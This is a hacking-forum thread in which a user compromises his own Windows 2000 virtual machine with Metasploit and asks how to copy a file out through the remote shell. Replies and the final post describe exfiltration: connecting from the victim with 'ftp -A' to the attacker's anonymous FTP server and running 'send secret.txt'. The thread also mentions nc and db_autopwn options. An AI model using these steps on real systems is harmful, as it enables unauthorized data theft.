Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: What to do with cmd

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default What to do with cmd

    so...... I run FC10 on my laptop with Windows 2000 on VirtualBox. I don't run back track, sorry guys. I wrote a textfile named secret.txt on the Windows box and saved it to C:. The object of the game was to retrieve it from FC10 pretending I knew no passwords and changing no settings on the windows box.

    I've almost got it. Using metasploit I can get the cmd prompt on the Windows box but then I don't know what else to do. I've tried using tftp to grab the secret txt and tried to start a telnet server to connect to,

    All that happens when I type commands in the remote cmd is that they get echoed but that's it. I know they work on the machine though cause if I run them from the VBox machine they start fine.

    So basically, I don't know what else to do once I get a shell...... I've googled my ass off on how to download files using cmd (or upload them) to no avail. I've been lurking here for a long time and generally find the solutions to my questions on my own but I'm just stuck on this one. Ironic.... seems like this would be the easy part.

  2. #2
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default

    oh... and p.s. When you run db_autopwn is there a command that displays what exploits/payloads got you your sessions so that you know what to patch/fix??

  3. #3
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Quote Originally Posted by Lithium@Revenge View Post
    so...... I run FC10 on my laptop with Windows 2000 on VirtualBox. I don't run back track, sorry guys.
    And you are posting in a forum for BackTrack, sorry guy.

    It is quite easy, just think about which other methods are there for transfering files.

    Edit: And you didn't even take the time to read the forum rules
    Tiocfaidh ár lá

  4. #4
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default

    Quote Originally Posted by KMDave View Post
    And you are posting in a forum for BackTrack, sorry guy.

    It is quite easy, just think about which other methods are there for transfering files.

    Edit: And you didn't even take the time to read the forum rules
    Okay.... now I read the rules I have tried running everything I can think of on a windows box that can use a command line and I just don't get it. Tried to download files with iexplore, telnet, tftp...... what else is there that comes with the windows box?? I doubt that xcopy will copy files across the network. Maybe. Worth looking into?? Idk.

    If I could I would use meterpreter but I can never "deliver" it as a payload. I can make the meterpreter.exe and just load it on the machine but that kind of defeats the purpose.


    Maybe the problem is I just don't know anything about windows...... All I ever use is Linux and I know how to work a linux shell. (WOW.... I'm opposite of all the other noobs)

    and if it makes you feel any better, I do have bt3 on VirtualBox... though I've probly only booted it twice since I installed it but I suppose I could boot it up and just metasploit there if it would make this thread more relevant.

    Guess I'll do some more googling. Maybe I'm just not using the right search terms. Usually google is my best friend.

    :::::::::::::::::::::::EDIT::::::::::::::::
    Well, I found one solution is to start an ftp server on my linux box and then connect with the FTP command from the windows cmd prompt and then transfer secret.txt . Haven't tried yet but it seems like it should work. Didn't even know cmd had a ftp command. Sweet.

  5. #5
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231

    Default

    Quote Originally Posted by Lithium@Revenge View Post
    oh... and p.s. When you run db_autopwn is there a command that displays what exploits/payloads got you your sessions so that you know what to patch/fix??
    Because I got off the right foot today and I was googling for exactly the same for about one hour today (and at the end found it in this forum) I help you with that:

    <spoonfeed_on>
    session -l -v
    or was it
    session -i <number> -v
    I already forgotten but I'm sure you will figure it out
    <spoonfeed_off>
    Auswaertsspiel

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by Lithium@Revenge View Post
    Didn't even know cmd had a ftp command. Sweet.
    You mean windows has an ftp client that works on the command line.
    Any rate why not try out nc ? It should work too.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Quote Originally Posted by archangel.amael View Post
    You mean windows has an ftp client that works on the command line.
    Any rate why not try out nc ? It should work too.
    I guess because NC doesn't come with cmd
    Tiocfaidh ár lá

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    OMG this screams SCRIDDIE!

    It's a text file, if you have command prompt just
    Code:
    type secret.txt
    then copy/paste from the command prompt screen.

    It doesn't get much easier.

    If you actually need to transfer the file then setup a ftp server on your "attacking" machine (or anywhere else you can get the file) and ftp from the victim machine to your server.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  9. #9
    Junior Member
    Join Date
    Mar 2009
    Posts
    83

    Default

    Quote Originally Posted by Lithium@Revenge View Post
    oh... and p.s. When you run db_autopwn is there a command that displays what exploits/payloads got you your sessions so that you know what to patch/fix??
    msf > db_autopwn[*] Usage: db_autopwn [options]
    -t Show all matching exploit modules
    -x Select modules based on vulnerability references
    -p Select modules based on open ports
    -e Launch exploits against all matched targets
    -r Use a reverse connect shell
    -b Use a bind shell on a random port
    -h Display this help text

    As far as I know, i haven't seen a command that'll show you what exploit worked... You could just go back and read and see what worked and what didn't. Though that would be a pain. Or you can scan the target and figure out which exploits work and what don't. Try and learn what is going on, then you can go and be lazy =)

  10. #10
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default

    Quote Originally Posted by laffing_man View Post
    As far as I know, i haven't seen a command that'll show you what exploit worked... You could just go back and read and see what worked and what didn't. Though that would be a pain. Or you can scan the target and figure out which exploits work and what don't. Try and learn what is going on, then you can go and be lazy =)
    the command is "sessions -l -v" ...... tells you what exploit worked and is previously mentioned in this thread.

    The point was just to be able to see if I could get the file..... and I did. Doesn't matter that it was a text file. Hell, I wrote it so I already knew what it said. Secret.txt was just symbolic. Just wanted to see if I could actually do it. And yes, I suppose I am a script kiddie but I do read (ALOT) to learn exactly how the exploits work (buffer overflow is a good example, read alot about that one) and I am currently trying to learn how to write my own (you know, checking in the debugger where the code starts, where it crashes, and what address' those are at. IDK it all yet... still reading)

    Thanks everybody for your input..... you in particular dave.... that simple comment "just think about which other methods are there for transfering files" made the difference. I was thinking the wrong way.

    Oh... and just in case for the search engines.... YES FTP worked great. Set up an FTP server on your box and then from the remote cmd "ftp -A 192.168.xx.xx" and after you connect use "send secret.txt" and there it is in your ftp folder. I set up an anon ftp server but you can set one up being a user if you want. Works for me so that my gf can upload and download .mp3's onto my laptop without username and password.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •